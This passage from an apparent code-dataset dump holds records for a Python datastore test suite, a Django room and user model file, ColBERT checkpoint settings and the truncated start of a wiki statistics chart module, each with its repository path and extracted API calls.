'()\n', (2379, 2381), True, 'import matplotlib.pyplot as plt\n'), ((2557, 2567), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2565, 2567), True, 'import matplotlib.pyplot as plt\n')] |
jbenet/datastore | datastore/core/test/test_basic.py | 6c0e9f39b844788ca21c5cf613c625a72fb20c20 |
import unittest
import logging
from ..basic import DictDatastore
from ..key import Key
from ..query import Query
class TestDatastore(unittest.TestCase):
def subtest_simple(self, stores, numelems=1000):
    def checkLength(expected_len):
      try:
        for sn in stores:
          self.assertEqual(len(sn), expected_len)
      except TypeError:
        pass
self.assertTrue(len(stores) > 0)
pkey = Key('/dfadasfdsafdas/')
checkLength(0)
# ensure removing non-existent keys is ok.
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
# insert numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.put(key, value)
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
# reassure they're all there.
checkLength(numelems)
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
checkLength(numelems)
k = pkey
n = int(numelems)
allitems = list(range(0, n))
def test_query(query, slice):
for sn in stores:
try:
contents = list(sn.query(Query(pkey)))
expected = contents[slice]
result = list(sn.query(query))
# make sure everything is there.
self.assertTrue(len(contents) == len(allitems),\
'%s == %s' % (str(contents), str(allitems)))
self.assertTrue(all([val in contents for val in allitems]))
self.assertTrue(len(result) == len(expected),\
'%s == %s' % (str(result), str(expected)))
self.assertTrue(all([val in result for val in expected]))
#TODO: should order be preserved?
# self.assertEqual(result, expected)
except NotImplementedError:
print 'WARNING: %s does not implement query.' % sn
test_query(Query(k), slice(0, n))
test_query(Query(k, limit=n), slice(0, n))
test_query(Query(k, limit=n/2), slice(0, n/2))
test_query(Query(k, offset=n/2), slice(n/2, n))
test_query(Query(k, offset=n/3, limit=n/3), slice(n/3, 2*(n/3)))
del k
del n
# change numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.put(key, value + 1)
self.assertTrue(sn.contains(key))
self.assertNotEqual(value, sn.get(key))
self.assertEqual(value + 1, sn.get(key))
checkLength(numelems)
# remove numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
class TestNullDatastore(unittest.TestCase):
def test_null(self):
from ..basic import NullDatastore
s = NullDatastore()
for c in range(1, 20):
c = str(c)
k = Key(c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
s.put(k, c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
for item in s.query(Query(Key('/'))):
raise Exception('Should not have found anything.')
class TestDictionaryDatastore(TestDatastore):
def test_dictionary(self):
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
stores = [s1, s2, s3]
self.subtest_simple(stores)
class TestCacheShimDatastore(TestDatastore):
def test_simple(self):
from ..basic import CacheShimDatastore
from ..basic import NullDatastore
class NullMinusQueryDatastore(NullDatastore):
def query(self, query):
raise NotImplementedError
# make sure the cache is used
s1 = CacheShimDatastore(NullMinusQueryDatastore(), cache=DictDatastore())
    # make sure the cache is not relied upon
s2 = CacheShimDatastore(DictDatastore(), cache=NullDatastore())
# make sure the cache works in tandem
s3 = CacheShimDatastore(DictDatastore(), cache=DictDatastore())
self.subtest_simple([s1, s2, s3])
class TestLoggingDatastore(TestDatastore):
def test_simple(self):
from ..basic import LoggingDatastore
class NullLogger(logging.getLoggerClass()):
def debug(self, *args, **kwargs): pass
def info(self, *args, **kwargs): pass
def warning(self, *args, **kwargs): pass
def error(self, *args, **kwargs): pass
def critical(self, *args, **kwargs): pass
s1 = LoggingDatastore(DictDatastore(), logger=NullLogger('null'))
s2 = LoggingDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestKeyTransformDatastore(TestDatastore):
def test_simple(self):
from ..basic import KeyTransformDatastore
s1 = KeyTransformDatastore(DictDatastore())
s2 = KeyTransformDatastore(DictDatastore())
s3 = KeyTransformDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_reverse_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return key.reverse
ds = DictDatastore()
kt = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('/a/b/c')
k2 = Key('/c/b/a')
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
ds.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertEqual(kt.get(k2), 'abc')
kt.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertEqual(kt.get(k2), 'abc')
ds.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertFalse(kt.contains(k2))
kt.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
def test_lowercase_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return Key(str(key).lower())
ds = DictDatastore()
lds = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestLowercaseKeyDatastore(TestDatastore):
def test_simple(self):
from ..basic import LowercaseKeyDatastore
s1 = LowercaseKeyDatastore(DictDatastore())
s2 = LowercaseKeyDatastore(DictDatastore())
s3 = LowercaseKeyDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_lowercase(self):
from ..basic import LowercaseKeyDatastore
ds = DictDatastore()
lds = LowercaseKeyDatastore(ds)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestNamespaceDatastore(TestDatastore):
def test_simple(self):
from ..basic import NamespaceDatastore
s1 = NamespaceDatastore(Key('a'), DictDatastore())
s2 = NamespaceDatastore(Key('b'), DictDatastore())
s3 = NamespaceDatastore(Key('c'), DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_namespace(self):
from ..basic import NamespaceDatastore
k1 = Key('/c/d')
k2 = Key('/a/b')
k3 = Key('/a/b/c/d')
ds = DictDatastore()
nd = NamespaceDatastore(k2, ds)
ds.put(k1, 'cd')
ds.put(k3, 'abcd')
self.assertEqual(ds.get(k1), 'cd')
self.assertFalse(ds.contains(k2))
self.assertEqual(ds.get(k3), 'abcd')
self.assertEqual(nd.get(k1), 'abcd')
self.assertFalse(nd.contains(k2))
self.assertFalse(nd.contains(k3))
def test(key, val):
nd.put(key, val)
self.assertEqual(nd.get(key), val)
self.assertFalse(ds.contains(key))
self.assertFalse(nd.contains(k2.child(key)))
self.assertEqual(ds.get(k2.child(key)), val)
for i in range(0, 10):
test(Key(str(i)), 'val%d' % i)
class TestNestedPathDatastore(TestDatastore):
def test_simple(self):
from ..basic import NestedPathDatastore
s1 = NestedPathDatastore(DictDatastore())
s2 = NestedPathDatastore(DictDatastore(), depth=2)
s3 = NestedPathDatastore(DictDatastore(), length=2)
s4 = NestedPathDatastore(DictDatastore(), length=1, depth=2)
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_nested_path(self):
from ..basic import NestedPathDatastore
nested_path = NestedPathDatastore.nestedPath
def test(depth, length, expected):
nested = nested_path('abcdefghijk', depth, length)
self.assertEqual(nested, expected)
test(3, 2, 'ab/cd/ef')
test(4, 2, 'ab/cd/ef/gh')
test(3, 4, 'abcd/efgh/ijk')
test(1, 4, 'abcd')
test(3, 10, 'abcdefghij/k')
def subtest_nested_path_ds(self, **kwargs):
from ..basic import NestedPathDatastore
k1 = kwargs.pop('k1')
k2 = kwargs.pop('k2')
k3 = kwargs.pop('k3')
k4 = kwargs.pop('k4')
ds = DictDatastore()
np = NestedPathDatastore(ds, **kwargs)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
np.put(k1, k1)
np.put(k2, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
np.delete(k1)
np.delete(k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
ds.put(k3, k1)
ds.put(k4, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
ds.delete(k3)
ds.delete(k4)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
def test_3_2(self):
opts = {}
opts['k1'] = Key('/abcdefghijk')
opts['k2'] = Key('/abcdefghijki')
opts['k3'] = Key('/ab/cd/ef/abcdefghijk')
opts['k4'] = Key('/ab/cd/ef/abcdefghijki')
opts['depth'] = 3
opts['length'] = 2
self.subtest_nested_path_ds(**opts)
def test_5_3(self):
opts = {}
opts['k1'] = Key('/abcdefghijk')
opts['k2'] = Key('/abcdefghijki')
opts['k3'] = Key('/abc/def/ghi/jka/bcd/abcdefghijk')
opts['k4'] = Key('/abc/def/ghi/jki/abc/abcdefghijki')
opts['depth'] = 5
opts['length'] = 3
self.subtest_nested_path_ds(**opts)
def test_keyfn(self):
opts = {}
opts['k1'] = Key('/abcdefghijk')
opts['k2'] = Key('/abcdefghijki')
opts['k3'] = Key('/kj/ih/gf/abcdefghijk')
opts['k4'] = Key('/ik/ji/hg/abcdefghijki')
opts['depth'] = 3
opts['length'] = 2
opts['keyfn'] = lambda key: key.name[::-1]
self.subtest_nested_path_ds(**opts)
class TestSymlinkDatastore(TestDatastore):
def test_simple(self):
from ..basic import SymlinkDatastore
s1 = SymlinkDatastore(DictDatastore())
s2 = SymlinkDatastore(DictDatastore())
s3 = SymlinkDatastore(DictDatastore())
s4 = SymlinkDatastore(DictDatastore())
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_symlink_basic(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
def test_symlink_internals(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
c = Key('/C')
d = Key('/D')
lva = sds._link_value_for_key(a)
lvb = sds._link_value_for_key(b)
lvc = sds._link_value_for_key(c)
lvd = sds._link_value_for_key(d)
# helper to check queries
sds_query = lambda: list(sds.query(Query(Key('/'))))
dds_query = lambda: list(dds.query(Query(Key('/'))))
# ensure _link_value_for_key and _link_for_value work
self.assertEqual(lva, str(a.child(sds.sentinel)))
self.assertEqual(a, sds._link_for_value(lva))
# adding a value should work like usual
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [1])
self.assertEqual(dds_query(), [1])
# _follow_link(sds._link_value_for_key(a)) should == get(a)
self.assertEqual(sds._follow_link(lva), 1)
self.assertEqual(list(sds._follow_link_gen([lva])), [1])
# linking keys should work
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [1, 1])
self.assertEqual(dds_query(), [1, lva])
# changing link should affect source
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 2)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [2, 2])
self.assertEqual(dds_query(), [2, lva])
# deleting source should affect link
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), None)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [None])
self.assertEqual(dds_query(), [lva])
# putting back source should yield working link
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# deleting link should not affect source
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [3])
self.assertEqual(dds_query(), [3])
# linking should bring back to normal
sds.link(a, b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# Adding another link should not affect things.
sds.link(a, c)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lva)
self.assertEqual(sds_query(), [3, 3, 3])
self.assertEqual(dds_query(), [3, lva, lva])
# linking should be transitive
sds.link(b, c)
sds.link(c, d)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(d), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(sds.get(a), sds.get(d))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lvb)
self.assertEqual(dds.get(d), lvc)
self.assertEqual(sds_query(), [3, 3, 3, 3])
self.assertEqual(set(dds_query()), set([3, lva, lvb, lvc]))
self.assertRaises(AssertionError, sds.link, d, a)
def test_symlink_recursive(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds1 = SymlinkDatastore(dds)
sds2 = SymlinkDatastore(sds1)
a = Key('/A')
b = Key('/B')
sds2.put(a, 1)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.put(b, 2)
self.assertEqual(sds2.get(a), 2)
self.assertEqual(sds2.get(b), 2)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.delete(a)
self.assertEqual(sds2.get(a), None)
self.assertEqual(sds2.get(b), None)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.put(a, 3)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), 3)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.delete(b)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
class TestDirectoryDatastore(TestDatastore):
def test_simple(self):
from ..basic import DirectoryDatastore
s1 = DirectoryDatastore(DictDatastore())
s2 = DirectoryDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestDatastoreCollection(TestDatastore):
def test_tiered(self):
from ..basic import TieredDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
ts = TieredDatastore([s1, s2, s3])
k1 = Key('1')
k2 = Key('2')
k3 = Key('3')
s1.put(k1, '1')
s2.put(k2, '2')
s3.put(k3, '3')
self.assertTrue(s1.contains(k1))
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertTrue(ts.contains(k1))
self.assertEqual(ts.get(k1), '1')
self.assertEqual(s1.get(k1), '1')
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertFalse(s1.contains(k2))
self.assertTrue(s2.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertTrue(ts.contains(k2))
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s1.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertEqual(ts.get(k2), '2')
self.assertEqual(s1.get(k2), '2')
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s3.contains(k2))
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertTrue(s3.contains(k3))
self.assertTrue(ts.contains(k3))
self.assertEqual(s3.get(k3), '3')
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertEqual(ts.get(k3), '3')
self.assertEqual(s1.get(k3), '3')
self.assertEqual(s2.get(k3), '3')
self.assertEqual(s3.get(k3), '3')
ts.delete(k1)
ts.delete(k2)
ts.delete(k3)
self.assertFalse(ts.contains(k1))
self.assertFalse(ts.contains(k2))
self.assertFalse(ts.contains(k3))
self.subtest_simple([ts])
def test_sharded(self, numelems=1000):
from ..basic import ShardedDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
s4 = DictDatastore()
s5 = DictDatastore()
stores = [s1, s2, s3, s4, s5]
hash = lambda key: int(key.name) * len(stores) / numelems
sharded = ShardedDatastore(stores, shardingfn=hash)
sumlens = lambda stores: sum(map(lambda s: len(s), stores))
def checkFor(key, value, sharded, shard=None):
correct_shard = sharded._stores[hash(key) % len(sharded._stores)]
for s in sharded._stores:
if shard and s == shard:
self.assertTrue(s.contains(key))
self.assertEqual(s.get(key), value)
else:
self.assertFalse(s.contains(key))
if correct_shard == shard:
self.assertTrue(sharded.contains(key))
self.assertEqual(sharded.get(key), value)
else:
self.assertFalse(sharded.contains(key))
self.assertEqual(sumlens(stores), 0)
# test all correct.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for i in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
sharded.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
if value % 2 == 0:
shard.delete(key)
else:
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
# try out adding it to the wrong shards.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this wont do anything
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.delete(key)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.put(key, value)
incorrect_shard.delete(key)
checkFor(key, value, sharded, correct_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, correct_shard)
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
self.subtest_simple([sharded])
if __name__ == '__main__':
unittest.main()
| [] |
Neisvestney/SentSyncServer | rooms/models.py | 45e9572b6c9b274ed2cbad28749fcb2154c98757 | from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
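# Illustrative shape of Room.to_dict(), with placeholder values (not part of
# the original module):
#   {'users': [{'id': 1, 'username': 'user', 'isHost': True}], 'tabUrl': ''}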
| [((68, 108), 'django.db.models.CharField', 'models.CharField', (['"""Code"""'], {'max_length': '(128)'}), "('Code', max_length=128)\n", (84, 108), False, 'from django.db import models\n'), ((123, 190), 'django.db.models.CharField', 'models.CharField', (['"""Tab url"""'], {'max_length': '(512)', 'default': '""""""', 'blank': '(True)'}), "('Tab url', max_length=512, default='', blank=True)\n", (139, 190), False, 'from django.db import models\n'), ((441, 512), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Room'], {'related_name': '"""users"""', 'on_delete': 'models.CASCADE'}), "(Room, related_name='users', on_delete=models.CASCADE)\n", (458, 512), False, 'from django.db import models\n'), ((529, 589), 'django.db.models.CharField', 'models.CharField', (['"""Username"""'], {'max_length': '(128)', 'default': '"""user"""'}), "('Username', max_length=128, default='user')\n", (545, 589), False, 'from django.db import models\n'), ((601, 631), 'django.db.models.BooleanField', 'models.BooleanField', (['"""Is host"""'], {}), "('Is host')\n", (620, 631), False, 'from django.db import models\n')] |
techthiyanes/ColBERT | colbert/parameters.py | 6493193b98d95595f15cfc375fed2f0b24df4f83 | import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
| [((23, 43), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (35, 43), False, 'import torch\n')] |
aburgd/sheila | jarvis/stats.py | 556cf3e4a6992b8ba609ba281f5a3657cd91e709 | #!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
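# Example of the helper above (illustrative values): the 'cls' keyword is
# rewritten to an HTML 'class' attribute, so
#   html('span', 'author', cls='rel-author')
# returns '<span class="rel-author">author</span>'.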
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
